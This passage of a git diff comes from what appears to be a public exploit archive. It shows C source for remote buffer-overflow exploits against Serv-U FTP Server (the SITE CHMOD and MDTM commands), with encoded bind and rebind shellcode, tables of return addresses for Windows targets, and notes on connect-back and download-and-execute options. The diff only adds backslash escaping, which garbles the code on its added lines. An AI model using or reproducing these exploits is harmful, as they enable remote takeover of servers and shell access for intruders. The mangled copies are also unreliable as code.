         lport=lport ^ 0x9696;
@@ -131,54 +131,54 @@ int main(int argc, char **argv) {
 
         ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
         if (ret==-1)
-                fatal("[-] connect()");
+                fatal(\"[-] connect()\");
 
         ret=recv(s,buff,4095,0);
         memset(buff+ret,0,1);
-        printf("%s",buff);
+        printf(\"%s\",buff);
         
-        sprintf(buff,"USER %s\r\n",user);
-        printf("%s",buff);
+        sprintf(buff,\"USER %s\\r\\n\",user);
+        printf(\"%s\",buff);
         send(s,buff,strlen(buff),0);
 
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        printf("%s",buff);
+        printf(\"%s\",buff);
         
-        sprintf(buff,"PASS %s\r\n",pass);
-        printf("%s",buff);
+        sprintf(buff,\"PASS %s\\r\\n\",pass);
+        printf(\"%s\",buff);
         send(s,buff,strlen(buff),0);
 
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        printf("%s",buff);
+        printf(\"%s\",buff);
 
-        if (strstr(buff,"230")==0) { 
-                printf("[-] bad login/pass combinaison\n"); 
+        if (strstr(buff,\"230\")==0) { 
+                printf(\"[-] bad login/pass combinaison\\n\"); 
                 exit(1); 
         }
 
-        sprintf(buff,"CWD %s\r\n",path);
-        printf("%s",buff);
+        sprintf(buff,\"CWD %s\\r\\n\",path);
+        printf(\"%s\",buff);
         send(s,buff,strlen(buff),0);
 
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        printf("%s",buff);
+        printf(\"%s\",buff);
 
         // verify directory
-        sprintf(buff,"PWD\r\n",path);
+        sprintf(buff,\"PWD\\r\\n\",path);
         send(s,buff,strlen(buff),0);
         ret=recv(s,buff,1024,0);
         memset(buff+ret,0,1);
-        i=strstr(buff+5,"\x22")-buff-5;
+        i=strstr(buff+5,\"\\x22\")-buff-5;
         if (i!=1) i++;  // trailing /
 
-        printf("[+] sending exploit..\n");
+        printf(\"[+] sending exploit..\\n\");
 
         bzero(buff,4096);
         memset(buff,0x90,600);
-        strcat(buff,"\r\n");
+        strcat(buff,\"\\r\\n\");
         delta-=i; // strlen(path);
         memcpy(buff,&chmod,strlen(chmod));
         memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
@@ -189,13 +189,13 @@ int main(int argc, char **argv) {
         
         ret=recv(s,buff,1024,0);
         if ((ret==0) || (ret==-1))
-                fatal("[-] ret()");
+                fatal(\"[-] ret()\");
         memset(buff+ret,0,1);
-        printf("%s",buff);
+        printf(\"%s\",buff);
 
         close(s);
 
-        printf("[+] done.\n");
+        printf(\"[+] done.\\n\");
 
         exit(0);
 }
diff --git a/platforms/windows/remote/23592.c b/platforms/windows/remote/23592.c
index 661fe80a3..c88cae038 100755
--- a/platforms/windows/remote/23592.c
+++ b/platforms/windows/remote/23592.c
@@ -1,6 +1,6 @@
 source: http://www.securityfocus.com/bid/9483/info
  
-RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
+RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a \'site chmod\' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 
 
 /*
 * serv-u 4.2 site chmod long_file_name stack overflow exp
@@ -14,8 +14,8 @@ RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue
 #include <winsock2.h>
 #include <stdio.h>
 
-#define CHMOD_CMD "SITE CHMOD 0666 "
-#define ERR_HEADER "550 /"
+#define CHMOD_CMD \"SITE CHMOD 0666 \"
+#define ERR_HEADER \"550 /\"
 #define SEH_STACK_POSITION 0x54
 #define BUF_STACK_POSITION 0x1ec
 #define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION - 
@@ -28,45 +28,45 @@ strlen(ERR_HEADER))
 //0x0A code removed from shellcode
 unsigned char bdshellcode[] =
 // decode
-"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
-"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
+\"\\xEB\\x10\\x5f\\x4f\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0f\\x99\\xE2\\xFA\"
+\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
 // shellcode
-"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
-"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
-"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
-"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
-"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
-"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
-"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
-"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
-"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
-"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
-"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
-"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
-"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
-"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
-"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
-"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
-"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
-"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
-"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
-"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
-"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
-"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
-"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
-"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
+\"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
+\"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\"
+\"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\"
+\"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\"
+\"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\"
+\"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\"
+\"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\"
+\"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\"
+\"\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\\xF3\\x9B\"
+\"\\x66\\xCE\\x75\\x12\\x41\\x5E\\x9E\\x9B\\x99\\x99\\xAC\\xAA\\x59\\x10\\xDE\\x9D\"
+\"\\xF3\\x89\\xCE\\xCA\\x66\\xCE\\x69\\xF3\\x98\\xCA\\x66\\xCE\\x6D\\xC9\\xC9\\xCA\"
+\"\\x66\\xCE\\x61\\x12\\x49\\x1A\\x75\\xDD\\x12\\x6D\\xAA\\x59\\xF3\\x89\\xC0\\x10\"
+\"\\x9D\\x17\\x7B\\x62\\x10\\xCF\\xA1\\x10\\xCF\\xA5\\x10\\xCF\\xD9\\xFF\\x5E\\xDF\"
+\"\\xB5\\x98\\x98\\x14\\xDE\\x89\\xC9\\xCF\\xAA\\x50\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\"
+\"\\xC8\\x5E\\xDE\\xA5\\xFA\\xF4\\xFD\\x99\\x14\\xDE\\xA5\\xC9\\xC8\\x66\\xCE\\x79\"
+\"\\xCB\\x66\\xCE\\x65\\xCA\\x66\\xCE\\x65\\xC9\\x66\\xCE\\x7D\\xAA\\x59\\x35\\x1C\"
+\"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\"
+\"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\"
+\"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\"
+\"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\"
+\"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\"
+\"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\"
+\"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\"
+\"\\x99\\xFA\\xF5\\xF6\\xEA\\xFC\\xEA\\xF6\\xFA\\xF2\\xFC\\xED\\x99\";
 
 //unsigned long jmp_esp = 0x77f4144b;
 //unsigned long jmp_ebx = 0x77a5211b;
 //unsigned long call_ebx = 0x750219d6; //use this one
 
 unsigned char evil_chmod[5000];
-unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
-                     "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
-                     "\x33\xc0"         //below: xor eax, eax
-                     "\xb0\x1c"         //mov al, 1c
-                     "\x03\xd8"         //add ebx, eax
-                     "\xc6\x03\x90";    //mov byte ptr [ebx], 90
+unsigned char seh[] = \"\\xeb\\x06\\x90\\x90\" //jmp below
+                     \"\\xd6\\x19\\x02\\x75\" //call_ebx = 0x750219d6
+                     \"\\x33\\xc0\"         //below: xor eax, eax
+                     \"\\xb0\\x1c\"         //mov al, 1c
+                     \"\\x03\\xd8\"         //add ebx, eax
+                     \"\\xc6\\x03\\x90\";    //mov byte ptr [ebx], 90
 
 
 int main(int argc, char **argv)
@@ -78,15 +78,15 @@ int main(int argc, char **argv)
   unsigned long     ip;
   unsigned char buf[100];
 
-  printf("*******************************************\n");
-  printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
-  printf("* Vul discovered by kkqq@0x557.org        *\n");
-  printf("* Coded by mslug@safechina.net            *\n");
-  printf("*******************************************\n");
-  printf("\n");
+  printf(\"*******************************************\\n\");
+  printf(\"* Serv-U 4.2 site chmod stack overflow exp*\\n\");
+  printf(\"* Vul discovered by kkqq@0x557.org        *\\n\");
+  printf(\"* Coded by mslug@safechina.net            *\\n\");
+  printf(\"*******************************************\\n\");
+  printf(\"\\n\");
 
   if(argc<6) {
-     printf("serv.exe <host> <port> <user> <password> <path>\n");
+     printf(\"serv.exe <host> <port> <user> <password> <path>\\n\");
      return 0;
   }
 
@@ -98,36 +98,36 @@ int main(int argc, char **argv)
 
   ftpsock = connect_tcp(argv[1], atoi(argv[2]));
   if(ftpsock < 0) {
-     printf("[-] Connection refused\n");
+     printf(\"[-] Connection refused\\n\");
      return 0;
   }
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
 
   recv_buf[ret] = 0;
-  printf("%s", recv_buf);
+  printf(\"%s\", recv_buf);
 
 
-  sprintf(buf, "USER %s\r\n", argv[3]);
+  sprintf(buf, \"USER %s\\r\\n\", argv[3]);
   send(ftpsock, buf, strlen(buf), 0);
 
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
 
   recv_buf[ret] = 0;
-  printf("%s", recv_buf);
+  printf(\"%s\", recv_buf);
 
-  sprintf(buf, "PASS %s\r\n", argv[4]);
+  sprintf(buf, \"PASS %s\\r\\n\", argv[4]);
   send(ftpsock, buf, strlen(buf), 0);
 
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
   recv_buf[ret] = 0;
-  printf("%s", recv_buf);
+  printf(\"%s\", recv_buf);
 
-  sprintf(buf, "CWD %s\r\n", argv[5]);
+  sprintf(buf, \"CWD %s\\r\\n\", argv[5]);
   send(ftpsock, buf, strlen(buf), 0);
 
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
   recv_buf[ret] = 0;
-  printf("%s", recv_buf);
+  printf(\"%s\", recv_buf);
 
   memset(evil_chmod, 0x90, sizeof(evil_chmod));
   memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
@@ -137,8 +137,8 @@ bdshellcode, strlen(bdshellcode));
 
   send(ftpsock, evil_chmod, strlen(evil_chmod), 0);
 
-  printf("[+] Shellcode sent\n");
-  printf("[+] Now nc to port 53\n");
+  printf(\"[+] Shellcode sent\\n\");
+  printf(\"[+] Now nc to port 53\\n\");
 
   closesocket(ftpsock);
   WSACleanup();
diff --git a/platforms/windows/remote/23763.c b/platforms/windows/remote/23763.c
index 6dff1a87f..38b0d434c 100755
--- a/platforms/windows/remote/23763.c
+++ b/platforms/windows/remote/23763.c
@@ -7,7 +7,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 /*
 *-----------------------------------------------------------------------
 *
-* Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command
+* Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x \"MDTM\" Command
 * Remote stack buffer overflow exploit
 *
 * Copyright (C) 2004 HUC All Rights Reserved.
@@ -19,12 +19,12 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 * Update   : 2004-02-24 Who report this bug to Rhino??? Released v5.0.0.4 patched this bug.
 *          : 2004-02-17 v7.0 Add Download url file and exec shellcode.
 *          : 2004-02-04 v6.1 Modified to work with UNIX.
-*          : 2004-02-01 v6.0 Change decode and target, change 'jmp(call) ebx' addr to 'pop,pop,ret' addr, can attack winXP and win2003 now.
+*          : 2004-02-01 v6.0 Change decode and target, change \'jmp(call) ebx\' addr to \'pop,pop,ret\' addr, can attack winXP and win2003 now.
 *          : 2004-01-31 v5.0 Add msvcrt.dll jmp ebx addr, can use on CN/TW/EN/KR/other win2k SP4 if msvcrt.dll not changed.
-*          : 2004-01-26 v4.2 Change attack target, 2.x to '>= 2.5i' and '<= 2.5h'.
+*          : 2004-01-26 v4.2 Change attack target, 2.x to \'>= 2.5i\' and \'<= 2.5h\'.
 *          : 2004-01-22 v4.1 Change connectback shellcode in one, change bind shellcode to rebind shellcode.
 *          : 2004-01-13 v4.0 Can attack Serv-U 2.x.
-*          : 2004-01-11 v3.1 Add "PORT" command, can penetrate through the firewall. (shport > 1024)
+*          : 2004-01-11 v3.1 Add \"PORT\" command, can penetrate through the firewall. (shport > 1024)
 *          : 2004-01-09 v3.0 Put shellcode in file parameter, can attack Serv-U 4.1.0.12
 *          : 2004-01-08 v2.0 Add connectback shellcode.
 *          : 2004-01-07 v1.0 Can attack Serv-U v3.0.0.16 ~ v4.1.0.11
@@ -40,7 +40,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 *          :     cl Servu2.c
 *          :On UNIX
 *          :     gcc -o Servu2 Servu2.c -DUNIX
-* Usage       :e:\>Servu2
+* Usage       :e:\\>Servu2
 *          :Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V7.0 (2004-01-07)
 *          :Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)
 *          :Welcome to HUC website http://www.cnhonker.com
@@ -55,7 +55,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 *          :        -f      Port of the FTP Server        Default: 21
 *          :        -s      Port of the Shell             Default: 53
 *          :        -c      Connect back IP               For connectback shellcode
-*          :        -d      Download the URL and Exec     Start with 'http://' or 'ftp://'
+*          :        -d      Download the URL and Exec     Start with \'http://\' or \'ftp://\'
 *------------------------------------------------------------------------
 */
 
@@ -65,7 +65,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 #include <stdio.h>
 #include <stdlib.h>
 
-#pragma comment(lib, "ws2_32")
+#pragma comment(lib, \"ws2_32\")
 #else
 #define uint32_t DWORD
 #include <sys/types.h>
@@ -104,8 +104,8 @@ int WSAGetLastError()
 
 #define MAX_LEN            2048
 #define    SEH_OFFSET         48-1
-#define JMP_OVER        "\xeb\x06\xeb\x06"
-#define    VERSION            "7.0"
+#define JMP_OVER        \"\\xeb\\x06\\xeb\\x06\"
+#define    VERSION            \"7.0\"
 
 // for rebind shellcode
 #define BIND_OFFSET        113
@@ -118,11 +118,11 @@ int WSAGetLastError()
 #define SHELLPORT        53
 #define FTPPORT         21
 #define DEFTYPE         0
-#define DEFUSER            "ftp"
-#define DEFPASS            "ftp@ftp.com"
+#define DEFUSER            \"ftp\"
+#define DEFPASS            \"ftp@ftp.com\"
 
 // for Serv-U 2.x
-#define READ_ADDR        "\x01\x01\xfd\x7f"
+#define READ_ADDR        \"\\x01\\x01\\xfd\\x7f\"
 #define READ_OFFSET        5+14+12
 
 struct
@@ -131,145 +131,145 @@ struct
         char    *szDescription;
 }targets[] =
 {
-        {0x7801D07B,"Serv-U 3.x/4.x/5.x  ALL   2K         SP3/SP4"},    //msvcrt.dll pop,pop,ret addr
-//      {0x78010394,"Serv-U 3.x/4.x/5.x  ALL   2K         SP4"},                //msvcrt.dll pop,pop,ret addr
-        {0x77c22ca7,"Serv-U 3.x/4.x/5.x  ALL   XP         SP1"},                //msvcrt.dll pop,pop,ret addr
+        {0x7801D07B,\"Serv-U 3.x/4.x/5.x  ALL   2K         SP3/SP4\"},    //msvcrt.dll pop,pop,ret addr
+//      {0x78010394,\"Serv-U 3.x/4.x/5.x  ALL   2K         SP4\"},                //msvcrt.dll pop,pop,ret addr
+        {0x77c22ca7,\"Serv-U 3.x/4.x/5.x  ALL   XP         SP1\"},                //msvcrt.dll pop,pop,ret addr
 
-//      {0x7FFA1CB5,"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
-        {0x7ffa1571,"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
-        {0x7ffa1c1b,"Serv-U 3.x/4.x/5.x  EN    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all EN win2000,winxp,win2003
-        {0x7ffae617,"Serv-U 3.x/4.x/5.x  TW    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all TW win2000,winxp,win2003
-//      {0x7ffa2186,"Serv-U 3.x/4.x/5.x  TW    2K         ALL"},                //jmp ebx addr for all TW win2000
-        {0x7ffa4a1b,"Serv-U 3.x/4.x/5.x  KR    2K         ALL"},                //jmp ebx addr for all KR win2000
+//      {0x7FFA1CB5,\"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
+        {0x7ffa1571,\"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
+        {0x7ffa1c1b,\"Serv-U 3.x/4.x/5.x  EN    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all EN win2000,winxp,win2003
+        {0x7ffae617,\"Serv-U 3.x/4.x/5.x  TW    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all TW win2000,winxp,win2003
+//      {0x7ffa2186,\"Serv-U 3.x/4.x/5.x  TW    2K         ALL\"},                //jmp ebx addr for all TW win2000
+        {0x7ffa4a1b,\"Serv-U 3.x/4.x/5.x  KR    2K         ALL\"},                //jmp ebx addr for all KR win2000
 
-        {0x7ffa4512,"Serv-U 2.x >= 2.5i  CN    2K/XP/2K3  ALL"},                //jmp esp addr for all CN win2000,winxp,win2003
-        {0x7ffa4512,"Serv-U 2.x <= 2.5h  CN    2K/XP/2K3  ALL"},                //jmp esp addr for all CN win2000,winxp,win2003
-        {0x7ffa24ce,"Serv-U 2.x >= 2.5i  TW    2K/XP/2K3  ALL"},                //jmp esp addr for all TW win2000,winxp,win2003
-        {0x7ffa24ce,"Serv-U 2.x <= 2.5h  TW    2K/XP/2K3  ALL"},                //jmp esp addr for all TW win2000,winxp,win2003
+        {0x7ffa4512,\"Serv-U 2.x >= 2.5i  CN    2K/XP/2K3  ALL\"},                //jmp esp addr for all CN win2000,winxp,win2003
+        {0x7ffa4512,\"Serv-U 2.x <= 2.5h  CN    2K/XP/2K3  ALL\"},                //jmp esp addr for all CN win2000,winxp,win2003
+        {0x7ffa24ce,\"Serv-U 2.x >= 2.5i  TW    2K/XP/2K3  ALL\"},                //jmp esp addr for all TW win2000,winxp,win2003
+        {0x7ffa24ce,\"Serv-U 2.x <= 2.5h  TW    2K/XP/2K3  ALL\"},                //jmp esp addr for all TW win2000,winxp,win2003
 
-        {0x7ffa82a4,"Serv-U 2.x >= 2.5i  KR    2K/XP/2K3  ALL"},                //call esp addr for all KR win2000,winxp,win2003
-        {0x7ffa82a4,"Serv-U 2.x <= 2.5h  KR    2K/XP/2K3  ALL"},                //call esp addr for all KR win2000,winxp,win2003
-        {0x778e71a3,"Serv-U 2.x >= 2.5i  EN    2K         SP4"},                //setupapi.dll jmp esp addr
-        {0x778e71a3,"Serv-U 2.x <= 2.5h  EN    2K         SP4"},                //setupapi.dll jmp esp addr
+        {0x7ffa82a4,\"Serv-U 2.x >= 2.5i  KR    2K/XP/2K3  ALL\"},                //call esp addr for all KR win2000,winxp,win2003
+        {0x7ffa82a4,\"Serv-U 2.x <= 2.5h  KR    2K/XP/2K3  ALL\"},                //call esp addr for all KR win2000,winxp,win2003
+        {0x778e71a3,\"Serv-U 2.x >= 2.5i  EN    2K         SP4\"},                //setupapi.dll jmp esp addr
+        {0x778e71a3,\"Serv-U 2.x <= 2.5h  EN    2K         SP4\"},                //setupapi.dll jmp esp addr
 
-//      {0x7802ba77,"Serv-U test"},
+//      {0x7802ba77,\"Serv-U test\"},
 },v;
 
 
 unsigned char    *szSend[4];
 unsigned char    szCommand[MAX_LEN];
 
-// 28 bytes decode by lion for overwrite eip, don't change this.
+// 28 bytes decode by lion for overwrite eip, don\'t change this.
 unsigned char decode[]=
-"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
-"\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
+\"\\xBE\\x6D\\x69\\x6F\\x6E\\x4E\\xBF\\x6D\\x69\\x30\\x6E\\x4F\\x43\\x39\\x3B\\x75\"
+\"\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\\xFF\\xD3\";
 
-// 31 bytes decode by lion for overwrite SEH, don't change this.
+// 31 bytes decode by lion for overwrite SEH, don\'t change this.
 unsigned char decode2[]=
-"\x5E\x5F\x5B\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43"
-"\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
+\"\\x5E\\x5F\\x5B\\xBE\\x6D\\x69\\x6F\\x6E\\x4E\\xBF\\x6D\\x69\\x30\\x6E\\x4F\\x43\"
+\"\\x39\\x3B\\x75\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\\xFF\\xD3\";
 
 
-// Shellcode start sign, use for decode, don't change this.
+// Shellcode start sign, use for decode, don\'t change this.
 unsigned char sc_start[]=
-"lion";
+\"lion\";
 
-// Shellcode end sign, use for decode, don't change this.
+// Shellcode end sign, use for decode, don\'t change this.
 unsigned char sc_end[]=
-"li0n";
+\"li0n\";
 
 // 344 bytes rebind shellcode by lion for Serv-U (xor with 0x99)
 unsigned char sc[]=
-"\x70\xBB\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
-"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x5B\x99\x99\x99"
-"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
-"\x71\xF3\x9E\xC0\x71\x30\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
-"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
-"\xF3\x9B\x66\xCF\x8D\x12\x41\x5E\x9E\x98\x99\x99\x99\xF3\x9D\x14"
-"\x8E\xCB\xF3\x9D\xF1\x66\x66\x99\x99\xCA\x66\xCF\x81\x5E\x9E\x9B"
-"\x99\x99\xAC\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCF\x85\xF3\x98\xCA"
-"\x66\xCF\xB9\xC9\xC9\xCA\x66\xCF\xBD\x12\x41\xAA\x59\xF1\xFA\xF4"
-"\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x8D\xC0\x10\x9D\x16"
-"\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10\xC6\xD1\x10"
-"\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8\xC8\xF3\x98"
-"\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66"
-"\xCF\x91\x72\x9E\x09\x09\x09\x09\x09\x09\x09\xCA\x66\xCF\xB1\x66"
-"\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF"
-"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
-"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC7"
-"\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44\x12\x9D"
-"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x40\x67\x66\x66\x17\xD7\x97\x75"
-"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2"
-"\x40\x90\x6C\x34\x75\x6B\xCC\x59\x3D\x83\xE9\x5E\x3D\x34\xB7\x70"
-"\x7C\xD0\x1F\xD0\x7E\xE0\x5F\xE0";
+\"\\x70\\xBB\\x98\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
+\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\x5B\\x99\\x99\\x99\"
+\"\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\"
+\"\\x71\\xF3\\x9E\\xC0\\x71\\x30\\x99\\x99\\x99\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\"
+\"\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\\x89\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\"
+\"\\xF3\\x9B\\x66\\xCF\\x8D\\x12\\x41\\x5E\\x9E\\x98\\x99\\x99\\x99\\xF3\\x9D\\x14\"
+\"\\x8E\\xCB\\xF3\\x9D\\xF1\\x66\\x66\\x99\\x99\\xCA\\x66\\xCF\\x81\\x5E\\x9E\\x9B\"
+\"\\x99\\x99\\xAC\\x10\\xDE\\x9D\\xF3\\x89\\xCE\\xCA\\x66\\xCF\\x85\\xF3\\x98\\xCA\"
+\"\\x66\\xCF\\xB9\\xC9\\xC9\\xCA\\x66\\xCF\\xBD\\x12\\x41\\xAA\\x59\\xF1\\xFA\\xF4\"
